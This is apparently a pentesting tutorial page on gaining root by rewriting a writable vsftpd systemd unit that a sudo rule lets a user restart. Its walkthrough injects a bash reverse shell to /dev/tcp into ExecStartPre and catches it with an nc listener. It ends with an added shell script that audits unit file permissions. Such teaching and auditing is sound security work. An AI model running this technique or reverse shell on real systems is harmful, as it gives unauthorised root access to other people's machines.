Sudo Service Privilege Escalation

The service command can be abused for privilege escalation if we can execute it as root through sudo.


Last updated 1 year ago

sudo -l

(ALL : ALL) /usr/sbin/service vsftpd restart

If we can execute the service command as root, we may be able to escalate to root privileges.

Assume we can operate the vsftpd service as root. First off, find the service config file for vsftpd.

find / -name "*vsftpd*"

For instance, we'll find locations like the ones below.

/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service

Once we have the locations, the next thing to do is check the permissions. If we have write permission on the above files, we can change what is executed when vsftpd starts.

Insert a reverse shell payload as the value of “ExecStartPre”. With this in place, we get a shell on our listener when the FTP daemon is restarted.

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target

Then we need to reload the daemon.

systemctl daemon-reload

On the local machine, start a listener to receive the shell.

nc -lvnp 4444

Now execute the command that we are allowed to run with sudo.

sudo /usr/sbin/service vsftpd restart

We should get a shell as the root user.
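
Everything above depends on a unit file, or the directory holding it, being modifiable by a non-root user. As an added example that is not part of the original page, this POSIX shell audit flags such units so the permissions can be corrected; `TRUSTED_UID`, `UNIT_DIRS` and the function names are assumptions of this sketch, and it relies on GNU `stat` and `readlink -f`.

```shell
#!/bin/sh
# Added example (not from the original page): flag systemd unit files that a
# non-root user could modify. TRUSTED_UID and UNIT_DIRS are assumptions.
TRUSTED_UID="${TRUSTED_UID:-0}"
UNIT_DIRS="/etc/systemd/system /lib/systemd/system /usr/lib/systemd/system"

# Print one finding if $1 is not owned by the trusted UID or is group/world
# writable. The body is a subshell so its variables stay local (POSIX sh).
check_path() (
    path=$1
    [ -e "$path" ] || exit 0
    uid=$(stat -c '%u' "$path")
    mode=$(stat -c '%a' "$path")
    if [ "$uid" != "$TRUSTED_UID" ]; then
        echo "UNTRUSTED-OWNER uid=$uid mode=$mode $path"
    elif [ $(( 0$mode & 022 )) -ne 0 ]; then
        echo "WRITABLE-BY-OTHERS uid=$uid mode=$mode $path"
    fi
)

# Audit unit files under the given directories (default: UNIT_DIRS).
# Symlinks such as multi-user.target.wants/vsftpd.service are resolved so the
# real file is checked. The parent directory is checked as well, because
# write access to it allows the unit file to be replaced.
audit_units() {
    [ $# -gt 0 ] || set -- $UNIT_DIRS
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" \( -type f -o -type l \) \
            \( -name '*.service' -o -name '*.socket' -o -name '*.timer' \) |
        while IFS= read -r unit; do
            real=$(readlink -f "$unit") || continue
            [ "$real" = /dev/null ] && continue   # masked unit, not a finding
            check_path "$real"
            check_path "$(dirname "$real")"
        done
    done | sort -u
}

# Run with: sh audit_units.sh --audit [dir ...]
if [ "${1:-}" = "--audit" ]; then shift; audit_units "$@"; fi
```

Any line it prints should be resolved by restoring root ownership and mode 644 on the unit file (755 on the directory) before a sudoers rule for `service <name> restart` is granted.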
